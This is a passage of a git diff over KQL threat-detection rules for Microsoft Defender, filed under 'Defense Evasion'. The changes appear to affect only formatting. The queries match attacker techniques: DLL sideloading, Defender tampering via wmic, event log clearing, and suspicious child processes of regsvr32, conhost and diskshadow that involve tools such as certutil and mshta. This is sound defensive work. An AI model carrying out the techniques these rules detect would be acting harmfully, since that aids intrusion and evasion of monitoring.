this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.) - -DeviceImageLoadEvents +// Title: Potential Wazuh Security Platform DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-13 +// Level: medium +// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.) + +DeviceImageLoadEvents | where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql index 06c7af4f..b368d77c 100644 --- a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql +++ b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql @@ -1,10 +1,10 @@ -// Title: Potential WerFault ReflectDebugger Registry Value Abuse -// Author: X__Junior -// Date: 2023-05-18 -// Level: high -// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 - -DeviceRegistryEvents +// Title: Potential WerFault ReflectDebugger Registry Value Abuse +// Author: X__Junior +// Date: 2023-05-18 +// Level: high +// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 + +DeviceRegistryEvents | where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql index cdd5f21a..f80dbf78 100644 --- a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql +++ b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Windows Defender Tampering Via Wmic.EXE -// Author: frack113 -// Date: 2022-12-11 -// Level: high -// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562 - -DeviceProcessEvents +// Title: Potential Windows Defender Tampering Via Wmic.EXE +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562 + +DeviceProcessEvents | where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql index fb937ab7..953859b2 100644 --- a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql +++ b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Winnti Dropper Activity -// Author: Alexander Rausch -// Date: 2020-06-24 -// Level: high -// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceFileEvents +// Title: Potential Winnti Dropper Activity +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceFileEvents | where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql index 060564f2..81e30852 100644 --- a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql +++ b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql @@ -1,12 +1,12 @@ -// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects usage of Dsacls to grant over permissive permissions -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate administrators granting over permissive permissions to users - -DeviceProcessEvents +// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects usage of Dsacls to grant over permissive permissions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrators granting over permissive permissions to users + +DeviceProcessEvents | where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql index 5b68fc1a..e4df4694 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-14 -// Level: high -// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: high +// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql index 707953c1..47897836 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Cabinet File Expansion -// Author: Bhabesh Raj, X__Junior (Nextron Systems) -// Date: 2021-07-30 -// Level: medium -// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - System administrator Usage - -DeviceProcessEvents +// Title: Potentially Suspicious Cabinet File Expansion +// Author: Bhabesh Raj, X__Junior (Nextron Systems) +// Date: 2021-07-30 +// Level: medium +// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents | where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql index e22d49ca..06dd67fe 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-13 -// Level: high -// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-13 +// Level: high +// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql index f45aa3dd..b296f73d 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Child Process Of DiskShadow.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-15 -// Level: medium -// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process Of DiskShadow.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications + +DeviceProcessEvents | where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql index 83cb720b..85740b3c 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Child Process Of Regsvr32 -// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-05 -// Level: high -// Description: Detects potentially suspicious child processes of "regsvr32.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Unlikely, but can rarely occur. Apply additional filters accordingly. - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process Of Regsvr32 +// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-05 +// Level: high +// Description: Detects potentially suspicious child processes of "regsvr32.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely, but can rarely occur. Apply additional filters accordingly. + +DeviceProcessEvents | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql index 8b1a76b6..7f7bb963 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Child Processes Spawned by ConHost -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-05 -// Level: high -// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1202, attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`. - -DeviceProcessEvents +// Title: Potentially Suspicious Child Processes Spawned by ConHost +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1202, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`. + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql index 44e61799..996d8e1c 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious CMD Shell Output Redirect -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-12 -// Level: medium -// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. -// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives - -DeviceProcessEvents +// Title: Potentially Suspicious CMD Shell Output Redirect +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: medium +// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. +// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql index 990a907d..ad4ecb69 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: high -// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql index b82c97a4..7a48ac32 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious DMP/HDMP File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-07 -// Level: medium -// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. - -DeviceFileEvents +// Title: Potentially Suspicious DMP/HDMP File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-07 +// Level: medium +// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql index 9543cafb..da91e6df 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Event Viewer Child Process -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-19 -// Level: high -// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 - -DeviceProcessEvents +// Title: Potentially Suspicious Event Viewer Child Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql index 6b6db9ad..024f6650 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Execution From Parent Process In Public Folder -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-02-25 -// Level: high -// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059 - -DeviceProcessEvents +// Title: Potentially Suspicious Execution From Parent Process In Public Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059 + +DeviceProcessEvents | where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql index 18f82a6f..eac2a502 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Execution From Tmp Folder -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: medium -// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Potentially Suspicious Execution From Tmp Folder +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql index 39f05471..8212cce7 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-25 -// Level: medium -// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.009 - -DeviceProcessEvents +// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-25 +// Level: medium +// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql 